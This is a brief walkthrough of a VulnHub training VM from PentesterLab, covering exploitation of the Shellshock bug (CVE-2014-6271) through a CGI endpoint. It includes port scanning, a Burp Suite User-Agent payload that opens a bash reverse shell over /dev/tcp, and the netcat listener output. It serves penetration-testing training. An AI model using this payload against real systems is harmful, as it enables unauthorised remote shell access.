Coffee Difficulty Rating:

Author Description

This course details the exploitation of the vulnerability CVE-2014-6271 AKA Shellshock. This vulnerability impacts the Bourne Again Shell “Bash”. Bash is not usually available through a web application but can be indirectly exposed through a Common Gateway Interface “CGI”.

Author: PentesterLab

Download: VulnHub

This is not a challenge VM

This VM is part of the exercises provided by, it's not a challenge VM (there is no flag to capture).

Host Enumeration

Port Scanning

nmap -v -p 1-65535 -sV -O -sT

Service Enumeration

Port Service Version Detection

TCP: 22


OpenSSH 6.0 (protocol 2.0)

TCP: 80


Apache httpd 2.2.21 ((Unix) DAV/2)

Website Inspection

Inspection of Squid using the metasploit module auxiliary/scanner/http/squid_pivot_scanning discovered port 80 was exposed via the proxy.

Shellshock Burp Suite

Burp Suite - Send Reverse Shellshock

Burp Suite was used to manipulate the User Agent: and deliver the following payload:

() { ignored;};/bin/bash -i >& /dev/tcp/ 0>&1

Burp Suite Shellshock Payload

Reverse Shell

Successfully connecting to the listening netcat instance:

[root:~]# nc.traditional -lp 443 -vvv
listening on [any] 443 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 44254
bash: no job control in this shell
bash-4.2$ id
uid=1000(pentesterlab) gid=50(staff) groups=50(staff),100(pentesterlab)

End of exercise.

Thanks for the VM :)